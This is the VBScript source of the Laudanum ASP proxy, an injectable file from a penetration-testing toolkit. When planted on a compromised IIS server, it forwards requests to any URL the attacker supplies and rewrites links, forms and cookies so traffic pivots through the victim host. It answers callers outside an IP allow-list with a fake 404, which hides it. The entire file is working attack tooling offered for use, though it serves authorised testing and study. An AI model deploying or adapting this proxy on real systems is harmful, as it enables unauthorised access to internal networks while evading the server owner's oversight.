<%@Language="VBScript"%> <%Option Explicit%> <%Response.Buffer = True%> <% ' ******************************************************************************* ' *** ' *** Laudanum Project ' *** A Collection of Injectable Files used during a Penetration Test ' *** ' *** More information is available at: ' *** http://laudanum.secureideas.net ' *** laudanum@secureideas.net ' *** ' *** Project Leads: ' *** Kevin Johnson ' *** ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access as a proxy. ' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or ' *** modify it under the terms of the GNU General Public License ' *** as published by the Free Software Foundation; either version 2 ' *** of the License, or (at your option) any later version. ' *** ' *** This program is distributed in the hope that it will be useful, ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ' *** GNU General Public License for more details. ' *** ' *** You can get a copy of the GNU General Public License from this ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 ' *** You can also write to the Free Software Foundation, Inc., Temple ' *** Place - Suite Boston, MA USA. ' *** ' ***************************************************************************** */ ' ***************** Config entries below *********************** ' Define variables Dim allowedIPs Dim allowed Dim i Dim s 'generic string, yeah, I know bad, but at this point I just want it to work Dim urltemp Dim urlscheme Dim urlhost Dim urlport Dim urlpath Dim urlfile Dim urlquery Dim http Dim method Dim contenttype Dim stream Dim regex Dim body Dim params function err_handler() %> Laudanum ASP Proxy

Fatal Error!

<%=Err.Number%>
<%=Err.Message%>
Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
<% end function function CleanQueryString ' removes laudurl from the querystring Dim i Dim j Dim s Dim key Dim q if len(request.querystring) = 0 then CleanQueryString = "" exit function end if ' build the request parameters for i = 1 to request.querystring.count key = request.querystring.key(i) 'response.write "
key:" & key if key = "laudurl" then ' if the key is laudurl, we need check if there is a ? in the string since ' it may have its own query string that doesn't get parsed properly. s = split(request.querystring("laudurl"), "?") if ubound(s) > lbound(s) then ' laudurl contains a ?, it must be manually parsed key = left(s(1), instr(s(1), "=") - 1) q = q & "&" & key & "=" & mid(s(1), len(key) + 2) end if else for j = 1 to request.querystring(key).count 'response.write "
-value:" & request.querystring(key)(j) q = q & "&" & key & "=" & request.querystring(key)(j) next end if next if len(q) > 0 then CleanQueryString = "?" & mid(q, 2) else CleanQueryString = "" end if end function function CleanFormValues() Dim r Set r = New RegExp r.IgnoreCase = true r.Global = true ' remove the laudurl paramater r.Pattern = "laudurl=[^&]+($|&)" CleanFormValues = r.Replace(request.form, "") Set r = nothing end function sub ParseUrl() ' parses the url into the global variables Dim urltemp Dim url 'get the url, it may be in the querystring for a get or from a form in a post url = Request.QueryString("laudurl") if url = "" then url = Request.Form("laudurl") end if if url = "" then urlscheme = "" urlhost = "" urlport = "" urlpath = "" urlfile = "" urlquery = "" exit sub end if ' Parse the url and break it into its components ' this is done so it can be used to rewrite the page ' ensure the url has a scheme, if it doesn't then assume http if instr(url,"://") = 0 then url = "http://" + url ' Get the scheme urlscheme = split(url, "://")(0) & "://" ' urltemp is used to hold the remainder of the url as each portion is parsed urltemp = mid(url, len(urlscheme) + 1) 'get the host if instr(urltemp, "/") = 0 then ' there is no path so all that is left is the host urlhost = urltemp urlport = "" urlpath = "/" urlfile = "" urlport = "" else ' there is more that just the hostname remaining urlhost = left(urltemp, instr(urltemp, "/") - 1) urltemp = mid(urltemp, len(urlhost) + 1) ' is there a port if instr(urlhost, ":") = 0 then ' no port urlport = "" else ' there is a port arr = split(urlhost, ":") urlhost = arr(0) urlport = ":" & arr(1) end if ' all that is left is the path and the query ' is there a query? if instr(urltemp, "?") = 0 then ' no query urlpath = urltemp 'urlquery = "" else 'Response.Write "

" & urltemp & "

" urlpath = left(urltemp, instr(urltemp, "?") - 1) 'urlquery = mid(urltemp, instr(urltemp, "?") + 1) end if if right(urlpath, 1) = "/" then urlfile = "" else ' we need to get the path and the file urltemp = split(urlpath, "/") urlfile = urltemp(ubound(urltemp)) urlpath = left(urlpath, len(urlpath) - len(urlfile)) end if end if urlquery = CleanQueryString 'response.write "
scheme: " & urlscheme 'response.write "
host: " & urlhost 'response.write "
port: " & urlport 'response.write "
path: " & urlpath 'response.write "
file: " & urlfile 'response.write "
query: " & urlquery 'response.write "
full: " & FullUrl() 'response.end end sub function FullUrl() FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery end function sub RewriteHeaders() Dim i Dim header Dim headervalue Dim regexdomain Dim regexpath ' setup a regular expression to clean the cookie's domain and path Set regexdomain = New RegExp regexdomain.IgnoreCase = true regexdomain.Global = true ' rewrite images and links - absolute reference regexdomain.Pattern = "domain=[\S]+" Set regexpath = New RegExp regexpath.IgnoreCase = true regexpath.Global = true ' rewrite images and links - absolute reference regexpath.Pattern = "path=[\S]+" ' go through each header for each i in Split(http.getAllResponseHeaders, vbLf) ' Break on the \x0a and remove the \x0d if it exists i = Replace(i, vbCr, "") ' make sure it is a header and value if instr(i, ":") > 0 then ' break the response headers into header and value header = trim(Left(i, instr(i, ":") - 1)) header = replace(header, "_", "-") headervalue = trim(Right(i, len(i) - instr(i, ":"))) ' don't add these two header types since they are handled automatically if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then if lcase(header) = "set-cookie" then ' strip the domain from the cookie headervalue = regexdomain.replace(headervalue, "") ' strip the path from the cookie headervalue = regexpath.replace(headervalue, "") headervalue = trim(headervalue) end if response.AddHeader header, headervalue end if end if next Set regexdomain = nothing Set regexpath = nothing end sub ' TODO: Add authentication support so it will work behind a proxy ' IPs are enterable as individual addresses TODO: add CIDR support allowedIPs = "192.168.0.1,127.0.0.1,::1" ' Just in cace you added a space in the line above allowedIPs = replace(allowedIPS," ","") 'turn it into an array allowedIPs = split(allowedIPS,",") ' ' make sure the ip is allowed ' TODO: change this to 0 for production, it is 1 for testing allowed = 0 for i = lbound(allowedIPs) to ubound(allowedIPs) if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then allowed = 1 exit for end if next ' send a 404 if the IP Address is not allowed if allowed = 0 then Response.Status = "404 File Not Found" Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) Response.End end if 'initialize variables Set http = nothing Set regex = nothing Set stream = nothing ' Define Constants const useMSXML2 = 0 const chunkSize = 1048576 ' 1MB ' parse the url into its parts ParseUrl() ' check if there is a valid url if len(FullUrl) = 0 then ' no url to proxy, give `em the boring default page ' Default layout of the page ' First thing you get when you hit the page without giving it a URL %> Laudanum ASP Proxy

Laudanum ASP Proxy

">
Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
<% Response.End() end if ' Let's get our Proxy on!!! ' define the request type if useMSXML2 = 1 then Set http = Server.CreateObject("MSXML2.XMLHTTP") else Set http = Server.CreateObject("Microsoft.XMLHTTP") end if ' get the request type method = Request.ServerVariables("REQUEST_METHOD") ' setup the request, false means don't send it yet http.Open method, FullUrl, False ' send the request if method = "POST" then params = CleanFormValues http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" http.setRequestHeader "Content-length", len(params) http.setRequestHeader "Connection", "close" http.Send(params) else http.Send end if ' Replace the normal headers with the ones from the response Response.Clear contenttype = http.getResponseHeader("Content-Type") Response.ContentType = contenttype ' rewrite the headers. Takes headers and passes them to new request RewriteHeaders() ' how to respond? is it text or is it something else? if lcase(left(contenttype, 4)) = "text" then ' response is text, so we need to rewrite it, but that's later ' do the rewriting body = http.responseText Set regex = New RegExp regex.IgnoreCase = true regex.Global = true ' rewrite images and links - absolute reference s = urlscheme & urlhost & urlport regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") ' rewrite images and links - full reference regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") ' rewrite images and links - absolute reference s = urlscheme & urlhost & urlport & urlpath regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") ' rewrite forms - absolute reference s = urlscheme & urlhost & urlport regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])" body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") ' rewrite forms - full reference regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])" body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") ' rewrite forms - absolute reference s = urlscheme & urlhost & urlport & urlpath regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])" body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") Response.Write(body) Set regex = nothing else ' some sort of binary response, so stream it Set stream = nothing Set stream = Server.CreateObject("ADODB.Stream") stream.Type = 1 'Binary stream.Open stream.Write http.responseBody stream.Position = 0 For i = 0 to stream.Size \ chunkSize Response.BinaryWrite(stream.Read(chunkSize)) next Set stream = nothing end if Set http = nothing Response.End :HandleError err_handler %>